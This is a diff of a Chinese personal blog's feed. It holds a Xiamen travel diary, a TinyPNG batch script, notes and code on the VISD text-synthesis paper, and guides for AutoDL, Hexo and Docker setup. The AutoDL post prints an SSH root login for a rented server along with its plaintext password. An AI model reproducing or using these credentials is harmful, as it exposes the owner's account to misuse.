    ​【12306】您购买的 9 月 1 日 D6315 次列车因故停运,需在 9 月 30 日前登录 12306 网站或到铁路车站按规定办理未乘区间退票手续,购买联程车票的,请于联程车票开车前一并办理退票,建议优先选择 12306 网站办理退票手续。

​ 台风居然真的把列车弄寄了?还好还能重买。估计这辆车要开到广东所以寄了,查了下可能是开到漳州的缘故吧。

    ​【12306】购票成功,9 月 1 日 D6221 次,福州南站 11:46 开。

    ​ 这样一来去厦门的时间就更早了。

    D6221:

    • 11:40 福州南
    • 12:16 莆田
    • 12:45 泉州
    • 13:13 厦门北

    9.1 集美之旅

    09:47 出发

    jpg

    ​ 收拾收拾包准备出发了。

    10:01 西门站

    jpg

    ​ 刚好快要走的那段时间,地铁 4 号线开了。这样我家坐地铁就更方便了!

​ 跟父母道了个别。明年见!

    10:39 地铁 4 号线

    jpg

    ​ 导航说坐到东街口站直接转 1 号线去福州南站。但是上次发现地铁 1 号线比较挤还比较旧,所以决定多坐一会儿 4 号线绕到后面再转车。

    10:59 检票口

    jpg

    ​ 从地铁站到检票口大概需要 1 个小时,现在还有半个多小时的宽裕时间。

    11:40 上车了!

    jpg

    ​ 上车了!再见福州!

    12:47 泉州站

    jpg

    泉州站
    welcome to 泉州
    就当作泉州游了
    体会下赛泥木的故乡
    好家伙
    这泉州人还蛮有礼貌的
    那可不得

    13:46 十里长堤

    jpg

    ​ 下了动车直接坐地铁进岛内。跨海的地铁还是在海平面以上的。

    ​ 就当作打卡一下十里长堤。

    14:21 BRT 车站

    jpg

    ​ 下地铁转公交的过程中很坑很坑地坐过站了😅,结果公交车 1 站跑了好远,还是大雨,算了还是打车回宾馆吧。

    14:46 宾馆

    jpg

    ​ 宾馆外围很破旧,里面装修还过得去。鉴定为勉强能住。

    ​ 把行李一扔再出发了。

    ​ 抬手看手环不知道什么时候掉了,血亏🤒。

    14:54 闽南风格建筑

    jpg

    ​ 宾馆外面很有闽南风格的建筑。

    15:02 某口号

    jpg

    ​ 口号里写着要把厦门努力建设成一个高素质高颜值现代化国际化城市。

    15:09 高崎机场 T3

    jpg

    ​ 确定一下机场的大概方位,转地铁去第一站——集美学村!

    ​ 不得不说厦门的机场离市中心真的很近。

    15:51 集美学村

    jpg

    入侵集大
    哈哈哈这里面只有集大的几个老校区
    本部还在远处
    可惜了
    入侵失败

    15:54 嘉庚式建筑

    jpg

    ​ 这大概就是嘉庚式建筑了吧。

    16:10 石鼓路

    jpg jpg jpg jpg

    ​ 石鼓路原来就是个美食街……一个人出来玩也没有啥想吃好东西的欲望,于是拍了拍对面的歌词墙。

    ​ 这些歌曲在网易云里都搜不到,可惜了。

    16:25 集美中学

    jpg

    ​ 按照小红书的路线,该打卡到龙舟池和嘉庚中学了。

    16:29 嘉庚式建筑

    jpg

    ​ 整个中学里的学生都在这么个嘉庚式建筑里学习,有点牛蛙。

    16:31 龙舟池

    jpg

    ​ 有点干涸的龙舟池。

    16:35 南薰楼

    jpg

    ​ 陈嘉庚亲自主持兴建,楼高十五层,建筑面积 8105 平方米,1959 年落成,为当时福建省最高大楼。融合了中西建筑的特色和优点,乃集美学村标志性建筑之一。

    16:38 嘉庚公园

    jpg


    jpg jpg jpg jpg

    ​ 为了纪念陈嘉庚先生修的公园。看得出当时陈嘉庚真的好有钱,半个厦门都是他修的。

    ​ 纪念馆里没啥东西,大概就是介绍了下陈嘉庚的生平,是个开橡胶工厂的。

    ​ 不知道多年后,人们会怎么评价曹德旺呢?

    17:26 沙县小吃

    jpg

    ​ 下雨天真的难受,还不能骑车。

    ​ 找了家沙县小吃解决晚饭问题,价格还蛮实惠。发现扁肉在厦门里叫扁食,而扁肉在其它地方叫馄饨,扁肉还是福州特色词汇?

    ​ 最后坐公交车回去了,走了 2w9+ 步,一到宾馆洗完澡就躺尸了。

    ​ 晚上雨居然停了,血亏😥。

    9.2 思明之旅

    06:43 福

    等下厦大西村公交站碰个头?
    可以可以
    在 3 号线上了

    jpg

    ​ 坐厦门地铁居然能看到宣传福州的 MV《福》。

    06:56 厦门站

    jpg

    ​ 这天是个周六,LYY 放假了,于是开玩!

    ​ 计划是南普陀寺-中山公园-沙坡尾-环岛路-胡里山炮台-演武大桥观景台-躺尸。

    ​ 坐地铁转公交先。结果到厦门站这边给我整迷路了😅。

    ​ 为了过这个马路,走了天桥还进了 BRT 安检。

    07:03 梧村车站

    jpg

    ​ 就连一个公交车站都有好几个站台……同样是岛内,明显感受到思明区和湖里区的差距。

    ​ 思明区太拥挤了。我记得第一次来厦门的时候,也迷路了好几次😅。

    07:51 南普陀寺

    jpg

​ 与 LYY 会合,第一站——南普陀寺!

    ​ 第一次来厦门的时候去过南普陀寺门口。而 LYY 在厦门工作了一年多还从来没有来过这个地方,所以最后还是我带的路才进去的😅。

    ​ 南普陀寺说是要预约,结果根本没人查😅。

    07:54 双子塔

    jpg

    ​ 厦门标志性建筑——双子塔。

    07:56 颂恩楼

    jpg

    ​ 厦门标志性建筑——厦门大学颂恩楼。

    07:57 放生池

    jpg

    ​ 放生池里做不雅动作的龟龟。

    08:03 寺院内部

    jpg

    ​ 里面就是经典的寺庙内容了,佛像啊,四大金刚啊巴拉巴拉。规模要比万佛寺差得远。

    ​ 但是寺庙还是很精致的,上面的龙精确到胡须。

    ​ 在后面的普陀山估计因为天气原因封山了,寄!

    08:32 中山公园

    jpg

    ​ 第二站——中山公园!

    ​ 很多城市都有纪念孙中山先生的地标,厦门似乎特别多。

    08:36 中山像

    jpg

    ​ 孙中山先生像。

    ​ 后面大概就是个小公园了,适合老同志休闲。

    08:51 小动物园

    jpg

    ​ 中山公园里还有个小动物园,不过没啥动物就是了。

    09:17 沙坡尾

    jpg

    ​ 下一站——沙坡尾!结果来太早了艺术中心都还没开门😅。

    ​ 沿街随便走一走好了。

    ​ 走着走着要不接着下一站——八市。

    ​ 等车的时候有个老太太跟我们聊天,看 LYY 在厦门工作一年就比较高兴,说厦门是个好地方,可以早点来厦门买房迁户口什么的。看我是福州的就不理我了😅。

    09:48 安徽板面

    jpg

    ​ 在厦门,安徽 ber 面还是安徽的🧐。

    09:54 八市

    jpg

    这就是八市吗
    是的
    就是个海鲜市场我觉得
    这为啥也叫旅游景点
    不是菜市场?
    体验厦门日常生活吧

    ​ 八市,原来就是个菜市场啊……

    ​ 虽然不知道为啥这也能叫旅游景点,但是呢,确实有点小时候逛菜市场的感觉。

    10:01 BRT

    jpg

    ​ 体验一下 BRT,以公交车的方式来近似达到地铁的效果😲。

    ​ 本土鳖还以为跟公交车一样还要前门进后门出,其实都可以进出的。

    11:22 牛肉火锅

    jpg

    ​ 又一阵折腾,去吃了 LYY 推荐的自助牛肉火锅。

    ​ LYY 嫌弃我战斗力不行😅。

    12:30 一国两制沙滩

    jpg

    ​ 打车去一国两制沙滩。然后打算在环岛路一路骑车去胡里山炮台。

    12:36 黑人妈祖

    jpg

    ​ 不太能理解为什么这个妈祖像的脸是黑的。

    12:38 妈祖望金门

    jpg

    ​ 查了下地图,对面就是金门列岛了。

    12:44 手的雕塑

    jpg

    ​ 手包围的不知道是对岸的什么山丘。

    13:07 共享自行车

    jpg

    ​ 走了好久都没有找到共享单车,于是跟 LYY 提议要不要骑这种大车。

    ​ 结果这个车是真的难骑,差评!

    13:17 ei meng

    jpg

    ​ 椰风寨的厦门标签,上面还有闽南语的注音。

    13:31 卡住了!

    jpg

    ​ 这个大车真的坑,根本过不去,后来跟里面的保安商量了下把机动车的栅栏打开了才让我们过去了😅。

    13:54 曾厝垵

    jpg

    ​ 路过第一次去厦门被坑得不要不要的曾厝垵。

    14:21 胡里山炮台

    jpg

    ​ 骑到了胡里山炮台。花费 25 元开冲!

    14:26 大炮

    jpg

    ​ 买的纪念币上应该就是这门炮吧,叫世界古炮王。

    14:26 三子塔

    jpg

    ​ 又见双子塔。旁边的大厦有点挡视线了,看上去像三子塔😅。

    14:41 克虏伯大炮

    jpg

    ​ 这个是炮台上最大的炮了。

    14:42 漳州

    jpg

    ​ 到山顶了,看一看对岸的漳州。

    14:45 某口号

    jpg

    ​ 三民主义统一中国,于蒋经国总统时期,中华民国政府为解决中国问题而提出的政策目标与政治口号。继蒋中正总统时期的反攻大陆与七分政治、三分军事的政策后,1981 年蒋经国总统时期的对于中华人民共和国与中国共产党的政策。其彰显中华民国政府在动员戡乱时期由一开始的武力反攻,转向为政治反攻。

    ​ 在山顶遥远地看大担岛,居然还真能隐约地看到对岸的口号。

    ​ 把手机拉到最高倍数 70 倍,可以看到模模糊糊的八个字。可以可以,值回票价了😀。

    14:50 独木成林

    jpg

    ​ 一棵巨大的榕树。

    14:58 白城沙滩

    jpg

    ​ 最后一站——白城沙滩!

    15:32 发呆

    jpg

    ​ 在白城沙滩上望着对面的漳州发了会儿呆,想着这个暑假就要结束了,艰苦的生活就要开始了。

    ​ 本来打算在演武大桥观景台看日落的,但是时间太久了还是算了吧下次一定。

    15:41 郑成功像

    jpg

    ​ LYY 说他走不动了,不陪我玩了,于是打车回湖里了。他请我吃饭,我请他打车🧐。

    ​ 桥对岸就是鼓浪屿了,想起了上次跟本科舍友玩厦门,由于本科舍友经济条件不太好导致都没玩什么项目。

    ​ 后面呢,回 LYY 家参观了一会儿,还体验了一把带 AI 的 PS。LYY 因为思明区房价太贵,在湖里区租了个很小的房间,每天通勤都要花很长时间。又聊了聊工作和未来的事情,算是体验了下不同的生活。觉得自己其实还算幸运,读研还是工作,有所得就有所失吧。

    17:21 机场标识

    jpg

    ​ T3 候机楼标识,原来河北航都是要从 T3 走的。

    9.3 又又冀了

    03:02 睡不着

    jpg

    ​ 本来宾馆老板可以帮我免费送机的,要我 4:40 起床再联系他。可是我根本睡不着,很早就醒了。为了不打扰宾馆老板还是自己打车走了。

    03:16 T3 航站楼

    jpg

    ​ 结果来太早了,门都没开,我还以为机场都是 24 小时开门的呢😯。

    ​ 查了查发现要 5 点才开门。

    ​ 于是下象棋打发时间。

    04:56 排队中

    jpg

    ​ 感觉这个航站楼特别小特别挤。

    ​ 排队的时候已经感受到一些人很明显就是河北人了,比较壮,声音也比较尖🫤。

    05:07 机票

    jpg

    ​ 厦门航空的机票。

    05:50 结果还是要坐摆渡车

    jpg

    ​ 登机牌明明说是走廊桥的,结果又变卦,绝,还得坐摆渡车😅。

    ​ 不知道是福建还是河北的问题,感觉福建到河北往返的航班都不怎么受重视,估计是太冷门了吧。

    06:00 机场摆渡车

    jpg

    ​ 幸好我动作比较快,坐到了摆渡车的座位里。

    06:15 再见厦门!

    jpg

    ​ 再见厦门,再见福建!

    06:19 可爱的玩偶

    jpg

    这家伙,跟你走了不少地方啊

    ​ 上飞机了。

    ​ 考研时候买的可爱的玩偶,一直陪伴我的研究生生活到现在。

    07:08 望金门

    jpg

    ​ 特意选了一个靠右边窗户的座位,这样起飞的时候就可以拍到金门了!

    07:18 朝霞

    jpg

    ​ 窗外的朝霞。

    ​ 厦门飞石家庄不用经停真的蛮舒服的,就是前期比较波折。

    09:52 正定机场

    jpg

    ​ 下飞机了,托运的行李还等了好久才拿到……

    ​ 想试试坐高铁到保定的路线,先从 7 号口出门坐摆渡车去正定机场站。

    ​ 看我落单背着大包拿着行李,就有好多人看出我是学生,过来问我要不要打车,直接无视嘻嘻嘻。

    09:57 高铁站摆渡车

    jpg

    ​ 感觉坐高铁还挺麻烦😅,要不下次还是直接坐城际大巴去学校吧,emmm 反正都累。

    10:07 正定机场站

    jpg

    ​ 到了正定机场站,感觉内部装潢跟保定东站几乎一致。

    10:37 上车!

    jpg

    ​ 上动车了,没啥想拍照的欲望,继续下象棋打发时间了。

    11:20 下车!

    jpg

    ​ 下车!由于已经在这里坐过好几次动车,对这里已经很熟悉了。

    11:25 京畿之门

    jpg

    这个 b 地方
    成功回来

    ​ 再次甩掉一群搭讪问我要不要打车的人,直接上了公交。

    ​ 公交车车上都是要去学校的学生,司机嗓门大声音尖还骂骂咧咧的,真是熟悉的味道啊🤪。

    11:54 红叶

    jpg

    ​ 到冀大了。

    ​ 这段时间保定还蛮热的,但是冀大门口的树居然有些泛红了🤔。

    12:11 想你的风还是吹到了 654

    jpg

    ​ 顺利抵达。内心还算平静吧。

    ​ 我刚来宿舍澡堂就开始装修,得跑老远才能洗澡,歪撒女内。

    ​ 新开了家瑞幸,丫哦。

    ​ 实验室厕所门换新了,丫哦。

    ​ 电瓶车居然还能骑,丫哦,但是不让停在实验室楼下了,歪撒女内。

    ​ 工位有电了,丫哦。

    ​ 新装了共享单车,丫哦。

    ​ 新的一段生活开始了。

    ]]>
    @@ -5268,7 +5268,7 @@ /posts/Diary-%E6%9A%91%E6%9C%9F%E5%9B%BE%E9%9B%86%EF%BC%887%20%E6%9C%88%EF%BC%89/ - 前言

    批量 tinypng 代码:

import os
import tinify

tinify.key = "XXX"

def get_all_files_in_folder(folder_path):
    files = []
    for root, dirs, filenames in os.walk(folder_path):
        for filename in filenames:
            file_path = os.path.join(root, filename)
            files.append(file_path)
    return files

folder_path = r'D:\...'  # replace with the folder you want to traverse
file_list = get_all_files_in_folder(folder_path)
for file in file_list:
    source = tinify.from_file(file)
    source.to_file(file)
    print(file, "finished.")
print("All finished!")

    正文

    7.2 FJNU

    jpg jpg jpg jpg jpg jpg jpg jpg jpg

    7.4 东街口、乌山、洪塘大桥

    jpg


    jpg


    jpg

    7.10 协和学院

    jpg

    7.12 FJUT

    jpg jpg jpg

    7.19-7.23 武汉

    png

    7.27 跟小迷糊逛 FJNU

    jpg jpg jpg jpg jpg jpg jpg jpg jpg

    7.29 永嘉天地

    jpg jpg jpg

    jpg


    jpg

    ]]>
    @@ -5295,7 +5295,7 @@ /posts/Paper-Verisimilar%20Image%20Synthesis%20for%20Accurate%20Detection%20and%20Recognition%20of%20Texts%20in%20Scenes/ - 资源

    正文

    提出了一个新的合成数据集的方式(数据集简称 VISD),在实验中表明其好使。

    1 Introduction

    研究了三种方法来应对 DNN 训练中的图像注释挑战。

    • 几何变换
    • 机器学习(GAN 等)
    • 图像合成

    创新点:

    • 语义连贯:通过将文本嵌入背景图像中语义敏感区域的图像合成

    • 视觉显著性:确定每个语义连贯区域内的嵌入位置

    • 设计了一个新颖的场景文本外观模型,通过自适应学习真实场景文本图像的特征来确定源文本的颜色和亮度。

    jpg

    所提出的场景文本图像合成技术:

    • 如左侧框所示,给定要嵌入背景图像中的背景图像和源文本,首先确定语义图和显著性图,然后将其组合以识别语义上合理和适合的文本嵌入位置。
    • 根据背景图像中嵌入位置周围的颜色、亮度和上下文结构,进一步自适应地确定源文本的颜色、明亮度和方向。
    • 右侧框中的图片显示了通过所提出的技术合成的场景文本图像。
    • Image Synthesis
    • Scene Text Detection
    • Scene Text Recognition

    3 Scene Text Image Synthesis

    所提出的场景文本图像合成技术:

    • 从两种类型的输入开始,包括“Background Images”和“Source Texts”

    • 给定背景图像,可以通过组合它们的“Semantic Maps“和”Saliency Maps”来确定文本嵌入的区域

      • “Semantic Maps” 可用作语义图像分割研究中的基本事实
      • “Saliency Maps”可以使用现有的显著性模型来确定
    • 可以根据确定的文本嵌入区域的颜色和亮度自适应地估计源文本的颜色和强度

    • 最后,“合成图像”是通过将渲染文本放置在计算出的嵌入位置来生成的。

    3.1 Semantic Coherence

    • 语义连贯(SC)是指文本应该嵌入背景图像中语义敏感区域的目标。例如,文本应该放在栅栏板上,而不是天空或羊头上,因为在真实场景中很少看到文本。因此,SC 有助于创建语义上更敏感的前景-背景配对,这对于通过使用合成图像来学习/训练的视觉表示以及对象检测和识别模型非常重要。

    jpg

    3.2 Saliency Guidance

    • 并非语义连贯的对象或图像区域内的每个位置都适合于场景文本嵌入。例如,更适合在黄色机器的表面上嵌入场景文本,而不是在两个相邻的表面上,需要某些机制来进一步确定语义相干对象或图像区域内的确切场景文本嵌入位置。

    • 我们利用人类视觉注意力和场景文本放置原理来确定场景文本的确切嵌入位置。为了吸引人类的注意力和眼球,场景文本通常被放置在同质区域周围,如路标,以创造良好的对比度和可见性。

    jpg

    • 适合于文本嵌入的位置可以通过对所计算的显著性图进行阈值处理来确定。在我们实现的系统中,使用了全局阈值,该阈值简单地取计算出的显著性图的平均值(见下方示意)。显著性引导有助于把文本嵌入语义敏感区域内的正确位置,其使用进一步有助于提高合成图像的逼真度,以及检测和识别模型学到的视觉表示。
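
示意如下(显著性图用随机数代替真实显著性模型的输出,仅说明阈值化这一步):

import numpy as np

sal = np.random.rand(240, 320)   # 假设这是显著性模型输出的显著性图
mask = sal > sal.mean()          # 全局阈值 = 显著性图均值
print(mask.mean())               # True 的位置即候选的文本嵌入区域占比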

    3.3 Adaptive Text Appearance

    • 将合成图像应用于训练场景文本检测和识别模型时,有效控制源文本和背景图像之间的对比度对于合成图像的有用性非常重要。

    • 设计了一种自适应对比技术,根据源文本在真实场景中的样子来控制源文本的颜色和亮度。其思想是搜索场景文本图像块(在现有数据集中的大量场景文本注释中容易获得),其背景具有与所确定的背景区域相似的颜色和亮度。然后可以通过参考搜索到的场景文本图像块内的文本像素的颜色和亮度来确定源文本的颜色和明亮度。

    • 对于每个文本注释,首先通过使用所研究的文本注释周围的背景区域来构建 HoG(定向梯度直方图)特征 $H_b$。注释框内文本像素的颜色和亮度的平均值和标准偏差也在 Lab 颜色空间中确定,用 $(\mu_L,\sigma_L)$、$(\mu_a, \sigma_a)$ 和 $(\mu_b, \sigma_b)$ 表示。因此,背景 HoG $H_b$ 和大量场景文本补丁的文本颜色和亮度统计 $(\mu_L, \sigma_L)$、$(\mu_a, \sigma_a)$ 和 $(\mu_b, \sigma_b)$ 形成了一个配对列表,如下所示:

$$P=\left\{H_{b_1}:(\mu_{L_1}, \sigma_{L_1}, \mu_{a_1}, \sigma_{a_1}, \mu_{b_1}, \sigma_{b_1}),\ \ldots,\ H_{b_i}:(\mu_{L_i}, \sigma_{L_i}, \mu_{a_i}, \sigma_{a_i}, \mu_{b_i}, \sigma_{b_i}),\ \ldots\right\}$$

    $H_b$ 将用作注释场景文本图像补丁的索引,$(\mu_L,\sigma_L)$、$(\mu_a,\sigma_a)$ 和 $(\mu_b,\sigma_b)$ 将用作设置源文本的颜色和亮度的指南。对于下图所示的每个确定的背景补丁(适用于文本嵌入),可以提取其 HoG 特征 $H_s$,从而可以基于 $H_s$ 和 $H_b$ 之间的相似性来确定具有最相似背景的场景文本图像补丁。

可以通过取相应的 $(\mu_L, \mu_a, \mu_b)$ 加上 $(\sigma_L, \sigma_a, \sigma_b)$ 周围的随机变化来确定源文本的颜色和亮度。
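
按这段描述,检索部分大致可以写成"对背景块提 HoG,再在标注库里找最近邻"。下面用 skimage.feature.hog 写一个最小示意(块大小、距离度量、随机数据都是假设,论文并未给出实现细节):

import numpy as np
from skimage.feature import hog

def hog_feat(patch):
    # 对固定大小的灰度块提取 HoG 特征向量
    return hog(patch, orientations=9, pixels_per_cell=(8, 8),
               cells_per_block=(2, 2), feature_vector=True)

bank = [np.random.rand(64, 64) for _ in range(10)]    # 假设的已标注文本块背景
H_bank = np.stack([hog_feat(p) for p in bank])

query = np.random.rand(64, 64)                        # 待嵌入文本的背景块
H_s = hog_feat(query)
best = int(np.argmin(np.linalg.norm(H_bank - H_s, axis=1)))
print("背景最相似的标注块:", best)                   # 再用它的均值/方差设定源文本颜色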

    jpg

    4 Implementations

    4.1 Scene Text Detection

    用 EAST 做测试模型。

    4.2 Scene Text Recognition

    使用 CRNN 模型来训练所有场景文本识别模型。

    5 Experiments

    5.1 Datasets and Evaluation Metrics

    使用的评估数据集:

    • ICDAR 2013
    • ICDAR 2015
    • MSRA-TD500
    • IIIT5K
    • SVT

    5.2 Scene Text Detection

    jpg

    这把消融实验和对比实验全放一起了。

    5.3 Scene Text Recognition

    jpg

    6 Conclusions

    好使。未来研究方向:进一步改进源文本的外观。

    7 Acknowledgement

    项目资助。

    数据集可视化

import cv2
import os
import matplotlib.pyplot as plt
import numpy as np

index = 987

image_dir = r'D:\dataset\VISD\10K\image\\'
label_dir = r'D:\dataset\VISD\10K\text\\'

image_path = os.path.join(image_dir, '1image_' + str(index) + '.jpg')
label_path = os.path.join(label_dir, '1image_' + str(index) + '.txt')

image_origin = cv2.imread(image_path)
image = image_origin.copy()
height, width, _ = image.shape
label_file = open(label_path, 'r')
annotations = label_file.readlines()
label_file.close()

for annotation in annotations:
    annotation_list = annotation.split(',')
    x = [int(num) for num in [annotation_list[0], annotation_list[2], annotation_list[4], annotation_list[6]]]
    y = [int(num) for num in [annotation_list[1], annotation_list[3], annotation_list[5], annotation_list[7]]]
    points = np.array([x, y], np.int32).T
    transcriptions = annotation_list[-1][:-1]

    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
        cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, transcriptions, (x[0], y[0] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
                min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
axes = axes.flatten()

axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
axes[0].axis('off')
axes[0].set_title('Origin')

axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
axes[1].axis('off')
axes[1].set_title('Annotation')

plt.tight_layout()
plt.show()

    png

    转换成 MindOCR 可读取的格式

import os
import numpy as np

image_dir = r'D:\dataset\VISD\10K\image\\'
label_dir = r'D:\dataset\VISD\10K\text\\'
save_dir = r'D:\dataset\VISD\10K\\'
save_file = "train_det_gt.txt"

string = ""

for label_file in os.listdir(label_dir):
    print('------', label_file, '------')

    index = int(label_file.split('_')[1].split('.')[0])

    image_file = label_file.split('.')[0] + '.jpg'
    label_path = os.path.join(label_dir, label_file)

    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    string += image_file
    string += "\t["

    for i, annotation in enumerate(annotations):
        annotation_list = annotation.split(',')
        x = [int(num) for num in [annotation_list[0], annotation_list[2], annotation_list[4], annotation_list[6]]]
        y = [int(num) for num in [annotation_list[1], annotation_list[3], annotation_list[5], annotation_list[7]]]
        points = np.array([x, y], np.int32).T
        transcriptions = annotation_list[-1][:-1]

        string += '{"transcription": "'
        string += transcriptions
        string += '", "points": ['
        for j, point in enumerate(points):
            string += "["
            string += str(point[0])
            string += ", "
            string += str(point[1])
            if j != len(points) - 1:
                string += "], "
            else:
                string += "]]}"
        if i != len(annotations) - 1:
            string += ", "
    string += ']\n'
    # print(string)

with open(os.path.join(save_dir, save_file), 'w') as file:
    file.write(string)
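
设计上,这段代码靠手工拼接字符串来生成 JSON,转义和引号都要自己保证。一个更省心的假设性替代是把每条标注先组织成 dict,再交给 json.dumps(输出的空格风格会和手拼略有差异,MindOCR 能否接受需自行确认):

import json

ann = {"transcription": "HELLO",
       "points": [[10, 20], [50, 20], [50, 40], [10, 40]]}
line = "img_1.jpg\t" + json.dumps([ann]) + "\n"
print(line)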
    ]]>
    @@ -5378,7 +5378,7 @@ /posts/Server-AutoDL/ - 部署

    登录 AutoDL 算力云 | 弹性、好用、省钱。租 GPU 就上 AutoDL

    启动钞能力!

    png

    选一个差不多合适的显卡,就是你了 RTX 2080 Ti!

    png

根据 Pay20Y/SEED (github.com) 里显示,他用的是 1.1.0 的 PyTorch,那就选 1.1.0 的 PyTorch(这也是为啥选 2080 Ti 的原因,3080 跑不了这么旧的 PyTorch):

    png

    设置好后,无卡模式开机:

    png

    获得 SSH 密钥:

    png

    记下登录指令和密码:

    ssh -p 44211 root@region-41.seetacloud.com
    Ae9NaYeuvd

    在 MobaXterm 里这么输入:

    • Remote host *:@region-41.seetacloud.com
    • Specify username:root
    • Port:44211

    png

    进去以后输入对应的用户名 root 和密码 Ae9NaYeuvd,就进去了:

    png

    看它的目录说明里写着把数据放在 autodl-tmp/ 里速度比较快,代码放 / 就行。

    搭建 SEED 的环境

把 ayumiymk/aster.pytorch: ASTER in Pytorch (github.com) 和 Pay20Y/SEED (github.com) 仓库里的东东下载到本地,然后传到服务器:

    png

    开始装环境:

    cd SEED-master
    pip install -r requirements.txt

    然后你就会喜提报错:

    png

    装完接着跑:

    pip install Cython
    pip install -r requirements.txt

    然后你就会喜提报错:

    png

    发现是安装 PyYAML 的时候报错的,单独安装它:

    pip install pyyaml

    然后在 requirements.txt 里把 PyYAML==5.1.2 给我删了。

    png

    我继续跑:

    pip install -r requirements.txt

    然后你就会喜提报错:

    png

    叫我移除对 Scipy 版本的指定:

    png

    我继续跑:

    pip install -r requirements.txt

    Successfully!

    png

    接下来按照 ayumiymk/aster.pytorch: ASTER in Pytorch (github.com) 里的 README.md 下载好 Pretrained model 和 Data for training and testing,最后开跑!

    png

    用完记得关机,不然把你钱钱扣光光。

    要用 GPU 的时候记得不要选无卡模式。

    如果还有错,就去请教最牛逼的**伟哥**!

    png

    ]]>
    @@ -5405,7 +5405,7 @@ /posts/Paper-BlenderText-%E6%97%A7/ -
    ]]>
    @@ -5434,7 +5434,7 @@ /posts/Hexo-%E7%BB%A7%E7%BB%AD%E4%BC%98%E5%8C%96%20hexo%20%E4%B8%BB%E9%A2%98/ - 正文

    修改 default_cover

    ​ 主题中的 default_cover 寄了很久了,才发现……

    https://tuapi.eees.cc/api.php?type=302&category=fengjing 还能用,可以返回一张随机的风景图片。

    png

    清理 topo

    ​ 仔细检查了下网页发现 topo 类没有什么作用,还占用响应时间,删了。

    png

    ​ 对应的样式也删了。

    png

    修改 categories-class-card

    ​ 在 _config.yml 中添加属性:

    categories_cover: https://tuapi.eees.cc/api.php?type=302&category=fengjing

    ​ 在 categories.ejs 里将 theme.default_cover 改为 theme.categories_cover

    png

    GitTalk

    ​ 自己的评论系统失效半年了……好多文章无法使用 GitTalk:

    png

    ​ 上网查了下解决方案:个人博客评论插件之 gittalk - 掘金 (juejin.cn)

    png

    ​ 解决方法居然是用自己的账号 @GZ-Metal-Cell,点击 使用 GitHub 登录 就可以了吗?就这么简单的问题居然卡了大半年一直没去修……

    ​ 没创建过的文章都点一遍,评论系统就可以用了,那好像还挺机车唉。

    ​ 之后 Github 就会自动帮你创建 Issues,要关闭评论的话应该进去把对应的 Issues 删了就行了吧:

    png

    ​ 但是这个评论系统,一般不科学上网是进不去的(好吧,我不知道 github.io 什么时候在福建会被封,毕竟在冀不翻墙是进不去的)

    Tinypng API

    ​ 这个功能还蛮有用的,尝试整个 API 用 Python 帮我批量压缩图片。

    ​ 登录 TinyPNG – 开发者 API (tinify.cn),管理 账号信息

    png

    ​ 申领一个 API:

    png

    ​ 使用教程:TinyPNG – API Reference (tinify.cn)

    ​ 我试一下:

    pip install --upgrade tinify
    import tinify

    tinify.key = "XXX"

    source = tinify.from_file("Test.jpg")
    source.to_file("Test_optimized.jpg")

    ​ OK,能使。

    png

    随机图片 API

    ​ 这个 https://tuapi.eees.cc/api.php?type=302&category=fengjing 还挺好玩,每次点进去都会返回出随机的图片,但是响应时间好像挺随机的,想想能不能搞一个属于自己的:

    ​ 使用:

    • PicGo 图床软件

    • JSdelivr 是一个免费的开源 CDN(Content Delivery Network)服务提供商。CDN 是一种将静态文件分发到全球多个服务器节点,以便更快地向用户提供内容的技术。比如

      …/…/…/…/2023/07/23/Diary-%E9%84%82%E4%BA%86%EF%BC%88%E4%BA%94%EF%BC%89/HY_8.jpg

      的响应速度就可能比

      https://cdn.jsdelivr.net/gh/GZ-Metal-Cell/GZ-Metal-Cell.github.io/2023/07/23/Diary-鄂了(五)/HY_8.jpg

要慢。(格式为 https://cdn.jsdelivr.net/gh/用户名/仓库名/文件名.jpg/png)

    • linux 下下面这个命令可以测试网址的响应时间:

    curl -o /dev/null -s -w "time_connect: %{time_connect}\ntime_starttransfer: %{time_starttransfer}\ntime_total: %{time_total}\n" "https://tuapi.eees.cc/api.php?type=302&category=fengjing"

    ​ 整一个 Github 仓库用于存放图片:

    png

    访客统计


    ]]>
    @@ -5459,7 +5459,7 @@ /posts/Software-Docker/ - 资源

    部署(Windows11 + Wsl2)

    ​ Docker 默认安装在 C 盘并且不可控,在安装前尝试将 Docker 迁移至 D 盘:

    ​ 新建文件夹:C:\Program Files\Docker D:\Program Files\Docker

    ​ 使用管理员权限的 cmd:

    png

    mklink /j "C:\Program Files\Docker" "D:\Program Files\Docker"
    为 C:\Program Files\Docker <<===>> D:\Program Files\Docker 创建的联接

    ​ 从 Docker: Accelerated Container Application Development 整一个 Windows 版本的 Docker。安装之。

    ​ 进设置,把 Resources -> Advanced 里的 Disk image location 移到 D 盘:

    png

    ​ 在 Docker Engine 里,添加 "registry-mirrors": ["https://registry.docker-cn.com", "https://docker.mirrors.ustc.edu.cn"] 以获得镜像加速。

    png

    使用(paddleCPU)

    获取镜像

    ​ 获取镜像,让它下载,等:

    docker pull registry.baidubce.com/paddlepaddle/paddle:2.5.1

    ​ 可以从 paddlepaddle/paddle - Docker Image | Docker Hub 获取更多镜像。

    ​ 等它下载完:

    What's Next?
    View summary of image vulnerabilities and recommendations → docker scout quickview registry.baidubce.com/paddlepaddle/paddle:2.5.1

    png

    创建容器

    docker run --name paddle_docker -it -v $PWD:/paddle registry.baidubce.com/paddlepaddle/paddle:2.5.1 /bin/bash
    • --name paddle_docker:设定 Docker 的名称,paddle_docker 是自己设置的名称;
    • -it:参数说明容器已和本机交互式运行;
    • -v $PWD:/paddle:指定将当前路径(PWD 变量会展开为当前路径的绝对路径)挂载到容器内部的 /paddle 目录;
    • registry.baidubce.com/paddlepaddle/paddle:2.5.1:指定需要使用的 image 名称,您可以通过docker images命令查看;/bin/bash 是在 Docker 中要执行的命令

    png

    ​ 检查是否可用:

    import paddle
    paddle.utils.run_check()

    png

    关闭容器

    exit

    第二次使用

    启动:

    docker start paddle_docker

    进入:

    docker attach paddle_docker

    png

    使用(paddleCPU + jupyter)

    获取镜像

